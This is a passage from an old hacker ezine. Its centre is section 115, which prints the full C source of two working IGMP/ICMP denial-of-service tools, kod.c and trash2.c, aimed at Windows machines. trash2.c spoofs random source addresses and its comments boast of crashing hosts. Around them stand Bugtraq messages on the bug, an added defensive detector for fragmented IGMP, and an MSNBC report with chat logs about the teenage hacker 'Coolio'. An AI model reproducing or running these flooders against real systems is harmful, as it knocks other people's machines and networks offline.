      Most of the $8,000 a month in income he has been reinvesting in Aonde to
      beef up its data base and lure potential investors. Nogueira is now in talks
      with at least five interested partners and lenders and is eyeing an Initial Public
      Offering toward the end of the year or in 2001 in New York and Rio de
      Janeiro. 
      
      "I want to get a bigger office and hire more people," Nogueira said. His
      father, a doctor, currently advises him on business deals and his mother
      helps him answer e-mails and arrange press meetings. 
      
      "But I guess I have dreams like everybody else. I want to buy a car," he
      admits. "I wouldn't mind a BMW." 
       
      @HWA
      
      
115.0 HWA:IGMP (kod.c kox.c trash2.c) Windows DoS (Old/but still effective)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Important info regarding the IGMP DoS against Windows machines missing      
      from past issues.
      
      kod.c - culprit#1
      
      #include <stdio.h>
      #include <netdb.h>
      #include <string.h>
      #include <unistd.h>
      #include <errno.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      size_t hits = 5;
      unsigned short port = 100;
      void usage (char *progname)
      {
        printf("Usage: %s <host> -p port -t hits\n", progname);
        exit(1);
      }
      void parse_args (int argc, char *argv[], char **target)
      {
       int y;
       *target = argv[1];
      
       if (argv[1][0] == '-') {
        printf ("Must specify a target.\n");
        exit (1);
       }
       for (y=2; y < argc; y++) {
        if (!strcmp(argv[y], "-p")) {
         y++;
         port = atoi (argv[y]);
        } else if (!strcmp(argv[y], "-t")) {
         y++;
         hits = atoi (argv[y]);
        }
       }
      }
      
      int main (int argc, char *argv[])
      {
       struct sockaddr_in sin;
       struct hostent *he;
       size_t maxpkt = 15000;
       char *target;
       char buf[15000];
       int sd;
      
       if (argc < 2)
        usage (argv[0]);
       parse_args (argc, argv, &target);
       if ((he = gethostbyname (target)) == NULL) {
        herror (target);
        exit (1);
       }
       memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
      
       sin.sin_family = AF_INET;
       sin.sin_port = htons (port);
      
       if ((sd = socket (AF_INET, SOCK_RAW, 2)) == -1) {
        perror ("error: socket()");
        exit (1);
       }
       if (-1 == connect (sd, (struct sockaddr *)&sin, sizeof (sin))) {
        perror ("error: connect()");
        close (sd);
        exit (1);
       }
       puts ("Determining max MSGSIZE");
       while (send (sd, buf, maxpkt, 0) == -1) {
        if (EMSGSIZE != errno) {
         perror ("error: send()");
         close (sd);
         exit (1);
        }
        maxpkt -= 1;
       }
       hits--;
       printf ("Max MSGSIZE is %d\n..%d bytes [%s:%d]..\n", maxpkt,
         maxpkt, target, port);
       while (hits--) {
        usleep (50000);
        if (send (sd, buf, maxpkt, 0) == -1) {
         perror ("error: send()");
         close (sd);
         exit (1);
        }
        printf ("..%d bytes [%s:%d]..\n", maxpkt, target, port);
       }
       sleep (1);
       close (sd);
       puts ("complete.");
      
       exit (0);
      }
      
      
      -=-
      
      trash2.c - updated and nastier attack
      
      /* Complex denial of service attack against Windows98/95/2000/NT Machines
         Overview: sends random, spoofed, ICMP/IGMP packets with random spoof source
         Result: Freezes the users machine or a CPU usage will rise to extreme
         lag. tested on:
              2.0.35
              2.2.5-15
              2.2.9
              2.0.36
        From a 56k I killed 2/5 Win/NT Box's, 5/5 Win98, 4/6 Win95.
        And those who didn't die, they where lagged to hell...
        You may freely alter this code, but give credit where credit is due 
              gcc -o trash2 trash2.c will do fine...
              e-mail leet@ibw.com.ni for any questions. 
      */
      /* greets go out to:
                  bombfirst, L^Warrior, codesearc, Asphyx, killtron, ^S|lver, randip(); fucntion stolen from kox.c
              acidspill, glock24, p0larbear, xjust, bxj2k, JUSTaGIRL [you know who you are]
              Drth_Maul,everyone in #bitchx@unet, #outlaw@unet, #slackware@unet, #kernel@unet
                                         [outlaw]
      
      */
              
      #include <stdio.h>
      #include <unistd.h>
      #include <stdlib.h>
      #include <string.h>
      #include <sys/types.h>
      #include <sys/time.h>
      #include <sys/socket.h>
      #include <pwd.h>
      #include <time.h>
      #include <sys/utsname.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <netinet/ip.h>
      #include <netinet/ip_icmp.h>
      #include <netinet/igmp.h>
      
      void banner(void) {
              
         printf("trash2.c - misteri0@unet [outlaw]\n\n");
         printf("\n\n");
      }
      void usage(const char *progname) {
         printf("usage:\n");
         printf("./trash  [dst_ip] [# of packets]\n",progname);
         printf("\t[*] [ip_dst] :  ex: 201.12.3.76\n");
         printf("\t[*] [number]  : 100\n");
         printf("\t-----------------------------------------\n");
      }
      unsigned int randip()
      {
              struct hostent *he;
              struct sockaddr_in sin;
              char *buf = (char *)calloc(1, sizeof(char) * 16);
      
              sprintf(buf, "%d.%d.%d.%d",
                      (random()%191)+23,
                      (random()%253)+1,
                      (random()%253)+1,
                      (random()%253)+1); 
      
              inet_aton(buf, (struct in_addr *)&sin);
              return sin.sin_addr.s_addr;
      }
      int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
         struct hostent *host;
         memset(addr,0,sizeof(struct sockaddr_in));
         addr->sin_family = AF_INET;
         addr->sin_addr.s_addr = inet_addr(name);
         if (addr->sin_addr.s_addr == -1) {
            if (( host = gethostbyname(name) ) == NULL )  {
               fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
               return(-1);
            }
            addr->sin_family = host->h_addrtype;
            memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
         }
         addr->sin_port = htons(port);
         return(0);
      }
      unsigned short in_cksum(addr, len)
          u_short *addr;
          int len;
      {
          register int nleft = len;
          register u_short *w = addr;
          register int sum = 0;
          u_short answer = 0;
      
          while (nleft > 1)  {
              sum += *w++;
              nleft -= 2;
          }
      
          if (nleft == 1) {
              *(u_char *)(&answer) = *(u_char *)w ;
              sum += answer;
          }
      
          sum = (sum >> 16) + (sum & 0xffff);
          sum += (sum >> 16);                 
          answer = ~sum;                      
          return(answer);
      }
      int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof)
      {
              int BIGIGMP = 1500;
              unsigned char *pkt;
              struct iphdr *ip;
              struct igmphdr *igmp;
              struct utsname *un;
              struct passwd *p;
      
              int i, s;
              int id = (random() % 40000) + 500;
      
      
              pkt = (unsigned char *)calloc(1, BIGIGMP);
      
              ip = (struct iphdr *)pkt;
              igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));
      
              ip->version = 4;
              ip->ihl = (sizeof *ip) / 4;
              ip->ttl = 255;
              ip->tot_len = htons(BIGIGMP);
              ip->protocol = IPPROTO_IGMP;
              ip->id = htons(id);
              ip->frag_off = htons(IP_MF);
              ip->saddr = spoof;
              ip->daddr = victim->sin_addr.s_addr;
              ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
      
              igmp->type = 0;
              igmp->group = 0;
              igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));
      
              for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
                  i < BIGIGMP; i++)
                      pkt[i] = random() % 255;
      #ifndef I_GROK
              un = (struct utsname *)(pkt + sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 40);
              uname(un);
              p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
              memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
      #endif
              if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                      perror("error: socket()");
                      return 1;
              }
      
              if(sendto(s, pkt, BIGIGMP, 0, victim,
                 sizeof(struct sockaddr_in)) == -1) { 
                      perror("error: sendto()");
                      return 1;
              }
              /* usleep(1000000); */
      
              for(i = 1; i < 5; i++) {
                      if(i > 3)
                              ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
                      else
                              ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
                      sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
                     /* usleep(2000000); */
              }
      
              free(pkt);
              close(s);
              return 0;
      }
      
      int send_winbomb(int socket,
                       unsigned long spoof_addr,
                       struct sockaddr_in *dest_addr) {
         unsigned char  *packet;
         struct iphdr   *ip;
         struct icmphdr *icmp;
         int rc;
      
         packet = (unsigned char *)malloc(sizeof(struct iphdr) +
                                          sizeof(struct icmphdr) + 8);
         ip = (struct iphdr *)packet;
         icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
         memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
         ip->ihl      = 5;
         ip->version  = 4;
      // ip->tos      = 2;
         ip->id       = htons(1234);
         ip->frag_off |= htons(0x2000);
      // ip->tot_len  = 0;
         ip->ttl      = 30;
         ip->protocol = IPPROTO_ICMP;
         ip->saddr    = spoof_addr;
         ip->daddr    = dest_addr->sin_addr.s_addr;
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
      
         icmp->type              = rand() % 15;
         icmp->code              = rand() % 15;
         icmp->checksum          = in_cksum(icmp,sizeof(struct icmphdr) + 1);
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct icmphdr) + 1,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
         ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
         ip->frag_off = htons(8 >> 3);
         ip->frag_off |= htons(0x2000);
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
         icmp->type = rand() % 15;
         icmp->code = rand() % 15;
         icmp->checksum = 0;
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct icmphdr) + 8,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
         free(packet);
         return(0);
      }
      int send_igmp(int socket,
                       unsigned long spoof_addr,
                       struct sockaddr_in *dest_addr) {
         
         unsigned char  *packet;
         struct iphdr   *ip;
         struct igmphdr *igmp;
         int rc;
               
             
         packet = (unsigned char *)malloc(sizeof(struct iphdr) +
                                          sizeof(struct igmphdr) + 8);   
          
         ip = (struct iphdr *)packet;
         igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
         
         memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
      
         ip->ihl      = 5;
         ip->version  = 4;
         ip->id       = htons(34717);
         ip->frag_off = htons(0x2000);
         ip->ttl      = 255;
         ip->protocol = IPPROTO_IGMP;
         ip->saddr    = spoof_addr;  
         ip->daddr    = dest_addr->sin_addr.s_addr;
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
      
          
         igmp->type              = 8;
         igmp->code              = 0;
           
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 1,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
          
      
         ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
         ip->frag_off = htons(8 >> 3);
         ip->version  = 4;
         ip->id       = htons(34717);
         ip->frag_off |= htons(0x2000);
         ip->ttl      = 255;
         ip->protocol = IPPROTO_IGMP;
         ip->saddr    = spoof_addr;
         ip->daddr    = dest_addr->sin_addr.s_addr;
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
      
         
         igmp->type              = 8;
         igmp->code              = 0;
               
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 1,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
         
      
         ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
         ip->frag_off = htons(8 >> 3);
         ip->frag_off |= htons(0x2000);
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
         
         igmp->type = 0;
         igmp->code = 0;
         
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 8,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
           
         free(packet);
         return(0);
                    
      }
      
      int main(int argc, char **argv) {
         struct sockaddr_in dest_addr;
         unsigned int i,sock;
         unsigned long src_addr;
         banner();
         if ((argc != 3)) {
            usage(argv[0]);
            return(-1);
         }
      
         if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
            fprintf(stderr,"ERROR: Opening raw socket.\n");
            return(-1);
         }
      
        /*  if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */
         src_addr = dest_addr.sin_addr.s_addr;
         if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
         printf("Status: Connected....packets sent.\n",argv[0]);
         for (i = 0;i < atoi(argv[2]);i++) {
            if (send_winbomb(sock,randip(),&dest_addr) == -1 || send_igmp(sock,randip(),&dest_addr) == -1 || sendwin98bug(&dest_addr, randip()) ) {
               fprintf(stderr,"ERROR: Unable to Connect To host.\n");
               return(-1);
            }
            usleep(10000);
         }
      }
      
      
      
      -=-
      
      
      Background Info:
      
      
      
      Re: IGMP fragmentation bug
      
      Aleph One (aleph1@SECURITYFOCUS.COM)
      Tue, 13 Jul 1999 00:13:47 -0700 
      
      Summary of the responses to this query. It seems the vulnerability can't
      be reproduced reliably in all instances. Try running the exploits
      for several minutes. Successful results have been obtained across a LAN
      as well as over the Internet. The result can vary from rebooting
      the machine, blue screen of death or killing networking.
      
      Several exploits have been produced, including kod, kox, pimp, moyari13,
      misfrag, faux and bengay. If you can't reproduce the vulnerability with
      one try another. All versions of Windows 95 and 98 are believed to be
      vulnerable (standard, OEM, SE, other languages).
      
      There are reports of Windows 2000 Advanced Server Beta 3, Professional Beta 3
      and Server Beta 3 being vulnerable. There are mixed reports of Windows 2000
      build 2000 being vulnerable. There is at least one report that Windows 2000
      build 2070 is not vulnerable. At least one report claims that Windows NT 4.0
      SP4 is vulnerable but others have reported otherwise.
      
      --
      Elias Levy
      Security Focus
      http://www.securityfocus.com/
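
      A defender-side check for the traffic discussed in this thread, as an
      added example (not code from this issue or from the Bugtraq posters): it
      parses IPv4 headers, flags IGMP datagrams that are fragmented or carry a
      TTL above 1, and counts fragments per destination rather than per source,
      since the source address may be spoofed. The function names, the sample
      header bytes and the documentation-range addresses are all constructed
      for illustration.

```c
/* Added example: flag fragmented IGMP and count it per destination address. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PROTO_IGMP   2
#define IP_MF_BIT    0x2000u
#define IP_OFF_MASK  0x1fffu
#define SIG_FRAGMENT 0x1u   /* MF set or non-zero fragment offset */
#define SIG_TTL      0x2u   /* TTL above 1; IGMP is normally sent with TTL 1 */
#define MAX_DESTS    8
#define NPKTS        6
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                         ((uint32_t)(c) << 8) | (uint32_t)(d))

struct ip_info {
    uint8_t  proto, ttl;
    uint16_t frag_off;      /* fragment offset in 8-byte units */
    int      more_frags;    /* MF flag */
    uint32_t dst;           /* host byte order; source is ignored, it can be spoofed */
};
struct tracker { uint32_t dst[MAX_DESTS]; unsigned hits[MAX_DESTS]; size_t n; };

/* Constructed sample IPv4 headers (checksum bytes left 0; not checked here). */
static const uint8_t SAMPLE[NPKTS][20] = {
    {0x45,0,0,28,  0,0,      0,0,       1,  2,0,0, 192,0,2,10,   224,0,0,1},    /* normal IGMP  */
    {0x45,0,0,36,  0x04,0xd2,0x20,0,    30, 1,0,0, 203,0,113,5,  198,51,100,7}, /* ICMP fragment */
    {0x45,0,5,0xdc,0x12,0x34,0x20,0,    255,2,0,0, 203,0,113,9,  198,51,100,7}, /* IGMP, MF, off 0   */
    {0x45,0,5,0xdc,0x12,0x34,0x20,0xb9, 255,2,0,0, 203,0,113,9,  198,51,100,7}, /* IGMP, MF, off 185 */
    {0x45,0,5,0xdc,0x56,0x78,0x21,0x72, 255,2,0,0, 203,0,113,77, 198,51,100,7}, /* IGMP, MF, off 370 */
    {0x45,0,5,0xdc,0x56,0x78,0x02,0x2b, 255,2,0,0, 203,0,113,77, 198,51,100,7}, /* IGMP, last, off 555 */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Parse the fixed IPv4 header; returns 0 on success, -1 if short or not IPv4. */
int parse_ipv4(const uint8_t *pkt, size_t caplen, struct ip_info *out)
{
    size_t hlen;
    uint16_t ff;
    if (caplen < 20 || (pkt[0] >> 4) != 4) return -1;
    hlen = (size_t)(pkt[0] & 0x0f) * 4;
    if (hlen < 20 || hlen > caplen) return -1;
    ff = rd16(pkt + 6);
    out->more_frags = (ff & IP_MF_BIT) != 0;
    out->frag_off   = (uint16_t)(ff & IP_OFF_MASK);
    out->ttl   = pkt[8];
    out->proto = pkt[9];
    out->dst   = ((uint32_t)rd16(pkt + 16) << 16) | rd16(pkt + 18);
    return 0;
}

/* Bitmask of anomalies for an IGMP datagram; 0 for normal IGMP or other protocols. */
unsigned igmp_signals(const struct ip_info *ip)
{
    unsigned sig = 0;
    if (ip->proto != PROTO_IGMP) return 0;
    if (ip->more_frags || ip->frag_off != 0) sig |= SIG_FRAGMENT;
    if (ip->ttl > 1) sig |= SIG_TTL;
    return sig;
}

/* Count a hit against dst; returns the running total, or 0 if the table is full. */
unsigned tracker_hit(struct tracker *t, uint32_t dst)
{
    size_t i;
    for (i = 0; i < t->n; i++)
        if (t->dst[i] == dst) return ++t->hits[i];
    if (t->n == MAX_DESTS) return 0;
    t->dst[t->n] = dst;
    t->hits[t->n++] = 1;
    return 1;
}

/* Scan the constructed sample; returns the highest per-destination fragment count. */
unsigned scan_sample(uint32_t *worst_dst)
{
    struct tracker t = { {0}, {0}, 0 };
    struct ip_info ip;
    unsigned worst = 0, n;
    size_t i;
    for (i = 0; i < NPKTS; i++) {
        if (parse_ipv4(SAMPLE[i], sizeof SAMPLE[i], &ip) != 0 ||
            !(igmp_signals(&ip) & SIG_FRAGMENT)) continue;
        n = tracker_hit(&t, ip.dst);
        if (n > worst) { worst = n; *worst_dst = ip.dst; }
    }
    return worst;
}

int main(void)
{
    uint32_t d = 0;
    unsigned n = scan_sample(&d);
    printf("%u fragmented IGMP datagrams to %u.%u.%u.%u\n", n, (unsigned)(d >> 24),
           (unsigned)((d >> 16) & 255), (unsigned)((d >> 8) & 255), (unsigned)(d & 255));
    return 0;
}
```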

      
      -=-
      

      Re: Patch for w98/igmp frag bug (alias kod) and ICMP-type 13 (aliasmoyari) DoS. Where?
      
      
      
           To: BUGTRAQ@SECURITYFOCUS.COM 
           Subject: Re: Patch for w98/igmp frag bug (alias kod) and ICMP-type 13 (aliasmoyari) DoS. Where? 
           From: R a v e N <barakirs@NETVISION.NET.IL> 
           Date: Sat, 28 Aug 1999 19:48:59 +0300 
           Approved-By: aleph1@SECURITYFOCUS.COM 
           Delivered-To: bugtraq@securityfocus.com 
           References: <37ce1592.7548193@tom.us.es> 
           Reply-To: barakirs@netvision.net.il 
           Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> 
      
      
      
      Microsoft didn't release a working* patch against the IGMP headers attack
      yet. It usually takes them a couple of months to release a patch against a
      DoS attack.
      I personally don't like the idea that even the dumbest script kiddie in
      the world could DoS me when I use Windows to connect to the Internet and
      run applications I don't have under Linux (I hate emulators and they hate
      me. We never get along. lol).
      Anyway, about that "downloader" you've mentioned: many products, whether
      they are freeware or shareware, come as some kind of a "downloader". I
      don't think Microsoft wants you to run this program in order to obtain
      information about your computer. They have other ways...
      
      * I said working because I saw some kind of an "experimental fix" (that's
      how they called it) on M$'s website once. I tried it and it didn't work at
      all (I tried all of the .c sources. kod.c, kox.c, fawx.c and that other
      one, whatever its name is. Some of them worked, some didn't. But the
      point is that some of them worked.
      I tried finding a URL for you guys on M$'s little webserver... no luck. It
      seemed to have disappeared. So much for "experimental fixes"...
      
      Roman Medina-Heigl Hernandez wrote:
      
      > {Sorry if this is known... Aleph, feel free to discard this message.}
      >
      >  I've been looking for a M$ *w98* patch for these DoS bugs and I've
      > found nothing. I visited M$ web, used the site's search engine (tried
      > keywords like "kod", "igmp", etc), viewed w98 support section,
      > security bulletins, ... with no success. :-(
      >
      >  M$ recommends a patch called "System Update" (included in Service
      > Pack 1), although it says nothing about the related DoS. Same occurs
      > with SP1 (for w98). Do they fix the problem? At least it seems not to
      > be documented.
      >
      >  I also want to show my unconformity with M$ policy about w98 SP. You
      > are forced to download an updater program in order to be able to
      > download SP (the alternative method is paying some $$ for ordering a
      > cd). Why do I need such a program? (I do not want to give the chance
      > to send info about my machine to M$...). Most of w98 users are usually
      > referred as dumb users, but I don't think they cannot use a patch in
      > .exe form (like NT Service Packs). Don't you think so, Bill? ;-)
      >
      >  Yours, Román.
      >
      > ------ E.T.S. Ingenieros Telecomunicacion ---------
      > ---\\     Roman Medina-Heigl Hernandez        //---
      > ---//       E-Mail:  roman@esi.us.es          \\---
      > ------- URL: http://www.esi.us.es/~roman ----------
      
      --
      It took the computing power of three Commodore 64 computers to fly to the
      moon.
      It takes a 486 66MHZ computer to run Windows 95. Anything wrong?
      
      http://blacksun.jemix.com
      
      
      
      
      @HWA
      
116.0 HNN:Mar 3rd:Coolio Charged With Defacement 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      The LAPD Computer Crimes Unit plans to charge a
      17-year-old New Hampshire resident in connection with
      defacing the Dare.org Web site. 'Coolio' has also
      admitted to defacing RAS.com and several other sites.
      The FBI is also investigating him concerning any
      involvement he may have had with DDoS attacks. He
      will be charged with unauthorized access to a computer
      and felony vandalism and would be charged as a
      juvenile. If convicted he could receive a fine of $18,000
      in restitution and possible time in a juvenile facility. If he
      is charged in New Hampshire he could be tried as an
      adult and would face five to 15 years in prison. 

      MSNBC
      http://www.msnbc.com/news/377102.asp
      
      ABC News 
      http://www.abcnews.go.com/sections/tech/DailyNews/webattack000302.html
      
      
      MSNBC;
       
       
      Dennis Moran Jr., a.k.a. 'Coolio,' spoke to NBC News Friday about
      computer hacking.
 
 
      <pic> follow url ... heh
       
      Coolio arrested, denies bringing down major sites
 
 
                                           By Bob Sullivan                                        
                                                    MSNBC
 
      March 8 - A New Hampshire teen-ager who had been questioned about last 
      month's crippling Internet assault has been arrested on an unrelated 
      charge. Seventeen-year-old Dennis F. Moran is charged with defacing the 
      anti-drug Web site DARE.org. But in an interview with NBC News last week, 
      Moran denied he had any involvement in the string of Web site attacks that 
      last month took down some of the Internet's biggest companies.
 
 
      Attrition.org: Coolio's defacements    
      http://www.attrition.org/mirror/attrition/coolio.html
     
     
      DURING AN INTERVIEW with the network, the New Hampshire teen who 
      uses the nickname Coolio on the Net admitted breaking into perhaps 
      100 computers and defacing the DARE.org Web site. He also admitted 
      to two other defacements - RSA.com in February and CWC.gov in 
      November. But he flatly denied any involvement in the Web site 
      attacks that toppled Yahoo, Amazon, eBay and several other major 
      Internet sites. And a federal investigator has told NBC's Pete 
      Williams that government agents are not close to an arrest in those 
      larger Web site attacks and that they are losing interest in 
      Moran as a suspect. The nickname Coolio has circulated in 
      connection with those Web attacks for several weeks, in part 
      because investigators reportedly hold transcripts of chat room 
      conversations that they say are incriminating. Federal 
      investigators searched his home last month and took Moran's 
      computers as part of their investigation, according to several 
      MSNBC sources. But Moran told NBC it was all part of a joke that 
      got out of hand - that his Internet friends started a rumor that he 
      had committed those crimes, and then as a joke, he took credit for 
      them. That joke, he said, then became a topic for rabid 
      conversation in an Internet chat room. The conversations were 
      observed by a security expert from Stanford University who sent 
      logs to the FBI, and then he became a suspect, the youth said. 
             
      FACING CHARGES
             Detective Michael Brausam of the LAPD, who
      investigated the DARE.org defacement, told MSNBC that
      Moran admitted to investigators last month that he defaced
      three Web sites, including RSA.com. Moran repeated that
      admission in his interview with NBC.
             The RSA site was hijacked in the middle of the furious
      denial-of-service attacks that rendered useless Yahoo,
      eBay, Amazon and several other major Web sites. But
      Moran denied being a part of those massive
      denial-of-service attacks.
             Moran is not the only suspect in those attacks;
      investigators believe there were at least one and perhaps
      several copycats involved in the flurry of vandalism which
      started Feb. 7 when Yahoo.com went down for about three
      hours.
             MSNBC has learned that investigators executed a
      search warrant at Coolio's home last month and confiscated
      all his computers in connection with their investigation of the
      crime.
             With regards to the DARE.org defacement, Brausam
      said Moran would be charged with unauthorized access to a
      computer and vandalism and would be charged as a
      juvenile. That means he faces at least $18,000 in restitution
      and possible time in a juvenile facility.
             "He did say he had done denial-of-service attacks
      before and said he had compromised hundreds of
      computers," Brausam said. 
 
      The detective began investigating Coolio after the Dare.org
      attack. Dare.org was hosted by a   Los Angeles ISP at the
      time of the defacement. Brausam traced the attacks to a Web
      site hosted by an Arizona ISP and said he found there a Web
      page that hosted the same images used to deface Dare.org. 
      
             That Web site also hosted programs that enabled
      smurf attacks, the same kind of attack used on Yahoo,
      Brausam said. 
      
             MSNBC has identified two denial-of-service programs
      Coolio adjusted to allow IP spoofing capabilities. 
             The first, called kox, is a modified version of the Kiss
      of Death denial of service program. Coolio took credit for
      the work by signing it and sending it to security mailing lists.
      The e-mail address used on the program maps to the server
      in Arizona where other Coolio files were discovered by
      Brausam. The e-mail also matches an e-mail address
      provided to MSNBC by several Coolio Internet associates.
             The second program, Targa, was described to
      MSNBC by a school-aged friend of Coolio's who said
      he'd used it once. A member of the #goonies said Coolio's
      Targa was a modified version of the Targa written by
      Mixter, a German programmer who has taken credit for
      writing denial-of-service tools. 
 
             After Brausam executed the search warrant at the
      Arizona ISP, he was able to uncover Coolio's identity and
      residence in New Hampshire.
             But his investigation stalled there while attempting to get
      the local New Hampshire police department to execute a
      search warrant.
             The same day as the Dare.org defacement, a
      government-run Web site, CWC.gov, was also defaced by
      Coolio, he said in the interview with NBC. That defacement
      included a death threat to the president, so the Secret
      Service became involved in the investigation. 
             The Web site was defaced with the message: "If
      prayers do not become mandatory throughout the United
      States, we will detonate our nuclear bombs and your
      President Clinton and his interns will die," according to an
      archive of the attack on attrition.org. 
 
             While Brausam waited for his search warrant, the Web
      site attacks on Yahoo, eBay and the other major Internet
      companies began. Then, on Feb. 12, the RSA.com home
      page was hijacked. 
             Brausam described Coolio as a genius who told
      authorities he'd been using computers since he was 3 years
      old and had taken to using the Internet 16 hours a day since
      dropping out of school last year. 
 
      SOURCE: Associated Press
 
 
             That's consistent with the image of Coolio that's been
      shared by friends and associates MSNBC has interviewed
      during the past few weeks. He's been described by both
      high school friends and Internet associates as a smart high
      school dropout who regularly gets high by drinking cough
      syrup. MSNBC has also learned that several of his Internet
      associates are cooperating with investigators and have
      fingered Coolio as the culprit in the larger Web page
      attacks.
              
              
      LOGS TELL A STORY
             Some of the logged chat room conversations - which
      Coolio now says are part of an elaborate joke and should
      not be taken seriously - were viewed independently by
      MSNBC.
             Almost immediately after the first attack, MSNBC was
      alerted to the #goonies chat room that the suspect
      frequented and told that Moran was responsible. "I think
      it's childish and I think he should be stopped," the
      anonymous writer said.
             MSNBC entered the chat anonymously. Coolio,
      unaware he was being observed by a journalist, made
      several comments suggesting he had special knowledge of
      the attacks. 
             In the first excerpt of the chat reproduced below,
      participants are watching CNN's coverage of the hacker
      attacks, often commenting on the reports' accuracy and
      inaccuracy. When discussing the attack, far from the false
      boasts typical of hackers trying to take credit for attacks
      they did not perform, Coolio is deliberately coy. He takes
      pains, for example, to refer to the attackers in the third
      person.
             In the log excerpts that follow, all nicknames other than
      Coolio's have been altered, but the rest of the statements,
      including typos, are published as they appeared:
             
      [17:33] <Coolio> i dont think the same hackers that did yahoo
                       had anything to do with cnn
      [17:33] <person2> they heard what happened to yahoo yesterday
      [17:33] <person2> so they decided to copy it
      [17:34] <person3> did they have anything to do with amazon.com?
      [17:34] <Coolio> person3, yes they did
      [17:34] <Coolio> since 45 minutes ago
      [17:34] <person3> alright.
      [17:34] <Coolio> tehye switched from ebay to amazon.
             
             But there are several references to Coolio making the
      news, even though that nickname didn't appear in news
      reports until one week later.
             
      [18:24] <person1> hahaha, coolio made ABC world news tonight, 
                        jesus f*ing christ.
      [18:24] <person1> how the f...
      [18:24] <Dr_Coolio> person1, whats ABC world news tonight?
             {excerpt removed}
      [18:24] <person1> Dr_Coolio, ABCs world news television show, every night.
      [18:24] <person3> haha its their network news show coolio
      [18:24] <Dr_Coolio> cool whatd they say
      [18:24] <person2> Coolio what did you do that is getting so much attention
      [18:24] <Dr_Coolio> and did they only talk about yahoo, or buy.com and ebay and amazon too?
             {excerpt deleted}
      [18:29] <person3> haha the zdtv just acknowledged that amazon was down
      [18:29] <Dr_Coolio> on TV?
      [18:29] <Dr_Coolio> awesome!
              
      "oh, my god, coolio is way famous." 
     
      COMMENT IN #GOONIES CHAT ROOM
      
             In this segment, one of Coolio's associates begins to
      cross the line, suggesting directly that Coolio is responsible.
      Coolio reacts sharply:
             
      [18:32] <person1> oh, my god, coolio is way famous.
      [18:33] <person1> dude, coolio, sitting at his computer ... disabled 
                        yahoo, and fooled people thinking he was a group of
                        f*ing hackers
      [18:33] <person2> ya no sH**..dont
      [18:33] <person2> heh..
             {excerpt removed}
      [18:33] <person1> how the f... coolio shouldnt be allowed to have this 
                        kind of power.
      [18:33] <Dr_Coolio> SHUT THE F*** UP PERSON1
      [18:33] <Dr_Coolio> SHUT THE F*** UP PERSON1
      [18:33] <person1> hahahahah
             
             The next day, Coolio was still fielding questions in
      #goonies about what he did and didn't do:
             
      [11:58] <person1> did you do all the other ones or were they copycats?
      [11:58] <person2> neck hurts bad
      [11:58] <Dr_Coolio> cnn znd zdnet were copycats
             
             And in this passage, the goonies chuckle about
      what seems to be an accidentally accurate description of
      Coolio. No reason for real alarm, though, they indicate
      the newscaster is wrong when he describes the suspect as a
      current student:
             
      [12:15] <person1> ahahhahahaha he said 17 year old kid
      [12:15] <Dr_Coolio> person1, WHO DID?
      [12:15] <person2> HAHAHA i wouldnt be suprised if it was a 17 year old kid
